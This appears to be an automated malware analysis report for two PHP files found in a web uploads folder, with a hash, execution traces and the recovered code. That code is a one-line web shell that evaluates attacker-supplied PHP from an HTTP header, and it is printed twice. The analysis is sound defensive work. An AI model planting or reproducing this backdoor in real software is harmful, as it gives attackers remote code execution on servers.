PHP Malware Analysis

123.php, z.php

md5: d86681835451a455164cd7f89dcc461e

Jump to:

Screenshot


Attributes

Execution


Deobfuscated PHP code

<?php

@eval($_SERVER['HTTP_PHPSPL01T']);

Execution traces

data/traces/d86681835451a455164cd7f89dcc461e_trace-1676245293.9613.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:41:59.859115]
1	0	1	0.000189	393512
1	3	0	0.000236	393872	{main}	1		/var/www/html/uploads/123.php	0	0
1	3	1	0.000260	393904
			0.000288	314256
TRACE END   [2023-02-12 21:41:59.859252]

data/traces/d86681835451a455164cd7f89dcc461e_trace-1676258942.7477.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:29:28.645475]
1	0	1	0.000139	393464
1	3	0	0.000183	393824	{main}	1		/var/www/html/uploads/z.php	0	0
1	3	1	0.000205	393856
			0.000229	314232
TRACE END   [2023-02-13 01:29:28.645593]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>